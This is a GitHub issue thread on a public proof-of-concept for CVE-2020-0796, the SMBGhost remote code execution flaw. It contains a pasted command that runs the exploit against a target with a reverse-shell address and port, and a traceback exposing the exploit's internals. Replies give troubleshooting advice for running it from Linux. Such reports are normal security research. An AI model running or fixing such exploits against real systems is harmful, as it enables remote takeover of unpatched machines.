CVE-2020-0796-RCE-POC

AttributeError: module 'ctypes' has no attribute 'windll'

Open raymondyeo88 opened this issue 5 years ago • 9 comments

Hi,

I received this error message after executing the SMBleedingGhost.py script, and the output of the error message is:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.131 192.168.75.129 4444
CVE-2020-0796 Remote Code Execution POC (c) 2020 ZecOps, Inc.

Traceback (most recent call last):
  File "SMBleedingGhost.py", line 909, in <module>
    exploit(target_ip, reverse_shell_ip, int(reverse_shell_port))
  File "SMBleedingGhost.py", line 854, in exploit
    allocation_pool_object_ptr = leak_allocation_pool_object_ptr(ip_address)
  File "SMBleedingGhost.py", line 522, in leak_allocation_pool_object_ptr
    address = leak_ptr(ip_address, ptr_offset, ptr_list)
  File "SMBleedingGhost.py", line 480, in leak_ptr
    byte_value = leak_ptr_byte(ip_address, ptr_offset + byte_index, ptr_list)
  File "SMBleedingGhost.py", line 454, in leak_ptr_byte
    if leak_if_ptr_byte_larger_than_value(ip_address, byte_offset, ptr_list, mid):
  File "SMBleedingGhost.py", line 414, in leak_if_ptr_byte_larger_than_value
    data = b'B'*offset + compress(payload)
  File "SMBleedingGhost.py", line 272, in compress
    RtlCompressBuffer = ctypes.windll.ntdll.RtlCompressBuffer
AttributeError: module 'ctypes' has no attribute 'windll'
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

Please help, and I would appreciate the assistance. =)

raymondyeo88 avatar Jun 14 '20 08:06 raymondyeo88

The script is designed to run on Windows due to the way the compress function is implemented: https://github.com/ZecOps/CVE-2020-0796-RCE-POC/blob/b9d4bfd8d820feaa60b9bc41ac059482e6f8bdb1/SMBleedingGhost.py#L256-L292

You can try replacing it with a cross-platform implementation, such as this one: https://github.com/you0708/lznt1

Michael-ZecOps avatar Jun 14 '20 11:06 Michael-ZecOps

Hi,

Thank you for the swift response. Does this mean that I need to install Python on a Windows 10 machine and run the script on a Windows 10 machine? Just to clarify.

raymondyeo88 avatar Jun 14 '20 12:06 raymondyeo88

Yes, that's one way. Another way is to use an alternative implementation of the compression which doesn't depend on the Windows API.

Michael-ZecOps avatar Jun 14 '20 12:06 Michael-ZecOps

Noted, and I will also try out the alternative implementation of the compression as stated above.

You are awesome =)

raymondyeo88 avatar Jun 14 '20 12:06 raymondyeo88

Wish there was a version that would run on Linux, like Kali.

Darkcast avatar Sep 29 '20 19:09 Darkcast

Oh no! Only for use on Windows?

coding-today avatar May 07 '22 08:05 coding-today

I have a question: I am getting an error (module 'ctypes' has no attribute 'windll') on Colab when I import pyditectinput. Can you help me out with this? Does this have anything to do with a VM?

naffa339434 avatar Jun 19 '22 08:06 naffa339434

Have you found any alternative implementation to use with Ubuntu? Could you please suggest one if you have come across any?

aravindsunkarNTTData avatar Nov 10 '22 21:11 aravindsunkarNTTData

I have a question: I am getting an error (module 'ctypes' has no attribute 'windll') on Colab when I import pyditectinput. Can you help me out with this? Does this have anything to do with a VM?

Have you resolved this, as I have run into the same error?

ereshmittal avatar Apr 09 '23 14:04 ereshmittal